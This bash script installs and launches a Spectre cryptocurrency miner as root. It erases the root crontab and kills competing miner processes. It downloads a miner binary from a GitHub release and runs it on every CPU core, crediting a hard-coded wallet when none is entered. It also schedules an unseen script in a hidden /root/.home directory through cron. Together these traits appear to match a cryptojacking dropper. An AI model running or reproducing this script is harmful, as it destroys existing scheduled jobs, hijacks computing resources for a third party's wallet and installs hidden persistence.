#!/bin/bash

# Remove existing crontab entries
sudo crontab -r

# Install unzip if not already installed
sudo apt update
sudo apt install -y unzip

# Run a script to kill processes if needed (ensure it's correct)
sudo ./killdero.sh
sudo pkill spectre

# Prompt for the wallet address
read -p "Enter your wallet address: " wallet_address

# Default wallet address if none is provided
if [ -z "$wallet_address" ]; then
  wallet_address="spectre:qp5cpywdz777e0yd38qkew275kf2f9q046nac7jaqshkrch9ua342rl9ch944"
fi

# Get the number of CPU cores
cpu_cores=$(nproc)
echo $cpu_cores > cpu_cores

# Download the miner package
sudo wget https://github.com/nambui979/spectre/releases/download/download/spectre-miner-v0.3.16-linux-gnu-amd64.zip -O spectre-miner.zip

# Check if download was successful
if [ $? -ne 0 ]; then
  echo "Failed to download the miner package"
  exit 1
fi

# Unzip the miner package
sudo unzip -o spectre-miner.zip -d spectre-miner > /dev/null 2>&1

# Check if unzip was successful
if [ $? -ne 0 ]; then
  echo "Failed to unzip the miner package"
  exit 1
fi

# Copy the miner binary to the current directory
sudo cp spectre-miner/bin/spectre-miner-v0.3.16-linux-gnu-amd64 spectre
chmod +x /root/.home/etc.sh
chmod +x /root/.home/lib.sh
chmod +x spectre

# Create the min.sh script
cat <<EOF > /root/min.sh
#!/bin/bash

# Wallet address
wallet_address="$wallet_address"

# Get the number of CPU cores
cpu_cores=\$(nproc)

# Run the miner with nohup to prevent it from being stopped when the session ends
sudo nohup /root/spectre -a \$wallet_address --spectred-address 34.71.95.124 --threads \$cpu_cores > /root/miner.log 2>&1 &
EOF

# Make the min.sh script executable
sudo chmod +x /root/min.sh

# Clear the existing crontab
cat /dev/null > /var/spool/cron/crontabs/root

# Add the script to the crontab
cat >>/var/spool/cron/crontabs/root <<EOF
0 0 * * * /root/.home/lib.sh &
EOF

# Set the correct permissions
chmod 0600 /var/spool/cron/crontabs/root

# Restart the cron service
sudo service cron restart

# Run the min.sh script
sudo /root/min.sh

echo "Miner setup and execution complete. Check /root/miner.log for output."
